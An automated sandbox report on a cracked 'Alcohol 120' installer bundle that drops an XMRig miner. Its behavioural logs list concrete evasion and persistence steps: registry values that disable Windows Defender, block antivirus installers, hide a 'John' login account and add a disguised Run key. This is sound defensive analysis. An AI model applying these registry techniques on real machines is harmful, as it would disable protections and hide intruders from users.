Malware Analysis Report

2025-01-06 10:32

Sample ID: 240601-d1qlqsgc6t
Target: 893e6bd2f77946a9c59f17ca91a6f2bb_JaffaCakes118
SHA256: 17f5d648ae3b0d81ce9bbaa5cf751fc7cda0cacbcd9b940a263dcebc5b63c182
Tags: upx xmrig discovery evasion execution miner persistence trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK: Enterprise Matrix V15
Analysis: static1 (Detonation Overview, Signatures)
Analyses behavioral7, behavioral3, behavioral6, behavioral11, behavioral13, behavioral14, behavioral16, behavioral1, behavioral4, behavioral8, behavioral15, behavioral5, behavioral9, behavioral12, behavioral2, behavioral10, each with the subsections Detonation Overview, Command Line, Signatures, Processes, Network, Files

Analysis Overview

Score: 10/10

SHA256: 17f5d648ae3b0d81ce9bbaa5cf751fc7cda0cacbcd9b940a263dcebc5b63c182

Threat Level: Known bad

The file 893e6bd2f77946a9c59f17ca91a6f2bb_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

upx xmrig discovery evasion execution miner persistence trojan

Modifies Windows Defender Real-time Protection settings

xmrig

Modifies visibility of hidden/system files in Explorer

XMRig Miner payload

Stops running service(s)

Modifies Windows Firewall

Blocks application from running via registry modification

Drops file in Drivers directory

Modifies file permissions

Checks computer location settings

Loads dropped DLL

UPX packed file

Executes dropped EXE

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Modifies WinLogon

Drops file in System32 directory

AutoIT Executable

Drops file in Program Files directory

Launches sc.exe

Program crash

Unsigned PE

Enumerates physical storage devices

NSIS installer

NTFS ADS

Suspicious behavior: LoadsDriver

Gathers network information

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Modifies system certificate store

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-01 03:28

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win7-20240220-en

Max time kernel

118s

Max time network

119s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-21.04.2015\msimg32.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1992 wrote to memory of 2836 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1992 wrote to memory of 2836 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1992 wrote to memory of 2836 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1992 wrote to memory of 2836 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1992 wrote to memory of 2836 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1992 wrote to memory of 2836 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1992 wrote to memory of 2836 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-21.04.2015\msimg32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-21.04.2015\msimg32.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win7-20240215-en

Max time kernel

120s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-10.10.2014\msimg32.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1844 wrote to memory of 1624 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1844 wrote to memory of 1624 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1844 wrote to memory of 1624 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1844 wrote to memory of 1624 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1844 wrote to memory of 1624 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1844 wrote to memory of 1624 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1844 wrote to memory of 1624 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-10.10.2014\msimg32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-10.10.2014\msimg32.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win10v2004-20240508-en

Max time kernel

147s

Max time network

149s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-19.11.2013\MSIMG32.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2776 wrote to memory of 848 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2776 wrote to memory of 848 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2776 wrote to memory of 848 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-19.11.2013\MSIMG32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-19.11.2013\MSIMG32.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 848 -ip 848

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 664

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 210.143.182.52.in-addr.arpa udp

Files

memory/848-1-0x00000000007E1000-0x00000000007E2000-memory.dmp

memory/848-0-0x00000000007E0000-0x00000000007E2000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win7-20240221-en

Max time kernel

118s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data.exe

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data.exe"

Network

N/A

Files

\Users\Admin\AppData\Local\Temp\nsd1547.tmp\SetupHlp.dll

MD5 65112ef6166d441df23715707c7488f7
SHA1 6e8ffef9a32978f43529b12e4a984df6365101be
SHA256 3b8406b26ba2f856192ded44e707d8a1a81daee89403a2600cae085e48b49713
SHA512 c0d1e5214958630beae24e4b2e8bf67553a1c695df7c3e78ff4a69a1ab27e8ded53a87d696185b0defc460ee2c3ac3e6912be263f332de04bcdabe3ecb9e589e

memory/2880-5-0x0000000074D60000-0x0000000074D72000-memory.dmp

\Users\Admin\AppData\Local\Temp\nsd1547.tmp\System.dll

MD5 c17103ae9072a06da581dec998343fc1
SHA1 b72148c6bdfaada8b8c3f950e610ee7cf1da1f8d
SHA256 dc58d8ad81cacb0c1ed72e33bff8f23ea40b5252b5bb55d393a0903e6819ae2f
SHA512 d32a71aaef18e993f28096d536e41c4d016850721b31171513ce28bbd805a54fd290b7c3e9d935f72e676a1acfb4f0dcc89d95040a0dd29f2b6975855c18986f

\Users\Admin\AppData\Local\Temp\nsd1547.tmp\LangDLL.dll

MD5 9384f4007c492d4fa040924f31c00166
SHA1 aba37faef30d7c445584c688a0b5638f5db31c7b
SHA256 60a964095af1be79f6a99b22212fefe2d16f5a0afd7e707d14394e4143e3f4f5
SHA512 68f158887e24302673227adffc688fd3edabf097d7f5410f983e06c6b9c7344ca1d8a45c7fa05553adcc5987993df3a298763477168d4842e554c4eb93b9aaaf

memory/2880-20-0x0000000074D00000-0x0000000074D12000-memory.dmp

memory/2880-27-0x0000000074D60000-0x0000000074D72000-memory.dmp

\Users\Admin\AppData\Local\Temp\nsd1547.tmp\nsDialogs.dll

MD5 c10e04dd4ad4277d5adc951bb331c777
SHA1 b1e30808198a3ae6d6d1cca62df8893dc2a7ad43
SHA256 e31ad6c6e82e603378cb6b80e67d0e0dcd9cf384e1199ac5a65cb4935680021a
SHA512 853a5564bf751d40484ea482444c6958457cb4a17fb973cf870f03f201b8b2643be41bccde00f6b2026dc0c3d113e6481b0dc4c7b0f3ae7966d38c92c6b5862e

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win7-20240508-en

Max time kernel

144s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.exe"

Signatures

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.exe

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.exe"

Network

N/A

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win10v2004-20240426-en

Max time kernel

149s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.exe

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win10v2004-20240508-en

Max time kernel

130s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\tool uninstall Alcohol\sptdremov.exe"

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\tool uninstall Alcohol\sptdremov.exe

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\tool uninstall Alcohol\sptdremov.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp

Files

memory/1420-0-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1420-1-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1420-3-0x0000000000400000-0x0000000000420000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win7-20240221-en

Max time kernel

151s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\ProgramData\Setup\update.exe N/A

Modifies visibility of hidden/system files in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" C:\Programdata\RealtekHD\taskhost.exe N/A

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Blocks application from running via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" C:\ProgramData\Setup\update.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\ProgramData\Setup\update.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Stops running service(s)

evasion execution

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" C:\ProgramData\RealtekHD\taskhostw.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\ProgramData\Setup\update.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\winmgmts:\localhost\root\CIMV2 C:\Programdata\RealtekHD\taskhost.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Kaspersky Lab C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Cezurity C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\ESET C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\AVG C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\360 C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Malwarebytes C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\COMODO C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\AVAST Software C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Common Files\McAfee C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Panda Security C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft JDX C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\AVG C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Cezurity C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\SpyHunter C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\ByteFence C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\SpyHunter C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Enigma Software Group C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\AVAST Software C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Kaspersky Lab C:\ProgramData\Setup\update.exe N/A
File created C:\Program Files\Common Files\System\iediagcmd.exe C:\ProgramData\Setup\update.exe N/A

Enumerates physical storage devices

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\ProgramData\Setup\update.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (certificate data omitted) C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\ProgramData\Setup\update.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate data omitted) C:\ProgramData\Setup\update.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate data omitted) C:\ProgramData\Setup\update.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate data omitted) C:\ProgramData\Setup\update.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\ProgramData\Setup\WinMgmts:\ C:\ProgramData\Setup\update.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\taskhost.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
